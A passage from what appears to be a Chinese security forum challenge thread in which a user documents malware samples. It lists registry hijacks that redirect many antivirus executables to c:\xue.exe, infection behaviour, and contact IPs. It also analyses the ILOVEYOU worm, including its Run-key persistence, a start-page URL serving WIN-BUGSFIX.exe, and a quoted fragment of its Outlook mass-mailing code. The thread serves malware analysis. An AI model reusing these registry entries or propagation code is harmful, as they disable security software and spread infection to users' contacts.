[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPCC.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPDOS32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPM.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPTC32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVSCHED32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWUPD32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKICE.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIAUDIT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFINET.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFINET32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95CF.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER3.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95_0.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ECENGINE.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESAFE.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EXPWATCH.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-STOPW.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FESCUE.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FP-WIN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPROT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRW.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMAVSP.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOAD95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOADNT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMON.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSUPP95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSUPPNT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IFACE.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IOMON98.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JEDI.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVsvc.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSvcUI.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVFW.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVwsc.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchUI.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOCKDOWN2000.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Logo1_.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Logo_1.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUALL.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MAILMON.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFTRAY.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N32SCANW.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Navapsvc.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Navapw32.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVNT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navw32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVWNT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NISUM.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NMain.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NORMIST.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NUPGRADE.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NVC95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAVCL.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAVSCHED.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAVW.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCCWIN98.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCFWALLICON.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PERSFW.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAV7.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAV7WIN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAVmon.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAVmonD.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAVtimer.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rising.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SAFEWEB.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCAN32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCAN95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANPM.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCRSCAN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SERV95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMC.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SPHINX.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SWEEP95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TBSCAN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TCA.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TDS2-98.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TDS2-NT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\THGUARD.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanHunter.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VET95.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VETTRAY.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VSCAN40.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VSECOMR.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VSHWIN32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VSSTAT.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WEBSCANX.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WFINDV32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ZONEALARM.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVP32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVPCC.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVPM.EXE]
"Debugger"="c:\\\\xue.exe"


其他行为:
搜索感染除系统盘以外的所有 .exe 文件, 不过好像一些安全文件也没感染, 在我硬盘里只有部分感染
运行被感染的文件时,生成 xue.xue 运行, 运行的软件报错

病毒联网: 222.84.225.165 和 208.68.139.89
mopery - 2010-3-28 15:50:00
病毒样本3

文件变化:
释放文件
C:\WINDOWS\Win32DLL.vbs
C:\WINDOWS\system32\LOVE-LETTER-FOR-YOU.HTM
C:\WINDOWS\system32\LOVE-LETTER-FOR-YOU.TXT.vbs
C:\WINDOWS\system32\MSKernel32.vbs

注册表变动:
病毒创建启动项
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSKernel32"="C:\WINDOWS\system32\MSKernel32.vbs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"Win32DLL"="C:\WINDOWS\Win32DLL.vbs"

病毒修改项
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

其他行为:
病毒扫描硬盘内的所有 "vbs" "vbe" "js" "jse" "css" "wsh" "sct" "hta" "jpg" "jpeg" "mp3" "mp2" 格式文件替换为与原文件同名的病毒副本

当病毒监测到 outlook 程序,就会给 outlook 里的所有联系人发送一封带有病毒的e-mail
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

说明:
由于病毒的较早前的, 所以有些行为无法复现
mopery - 2010-3-28 15:55:00
附件为截图

附件: 截图.rar
baohe - 2010-3-28 16:06:00
不错!
赞一个!:kaka12:
networkedition - 2010-3-29 10:53:00
高手膜拜一下:kaka12:
mopery - 2010-3-29 10:59:00


引用:
原帖由 networkedition 于 2010-3-29 10:53:00 发表
高手膜拜一下:kaka12: 


你就使劲欺负我吧... -.-
最硬的石头 - 2010-4-1 17:18:00
:kaka12: 看看
是昔流芳 - 2010-4-5 20:25:00
来此围观
辛达星郁 - 2010-4-5 20:29:00
围观学习
辛达星郁 - 2010-4-5 20:40:00
:kaka4: 这个附件也看不了
wanghy11111 - 2010-4-5 21:59:00
围观
zzzkkkmmm - 2010-4-5 23:27:00
哎!很想看没办法只好回帖了
jks_风 - 2010-4-6 10:05:00
呵呵,都是技术团队的大牛,:kaka12: 前来膜拜~
1
查看完整版本: [Simple Lions]第四关闯关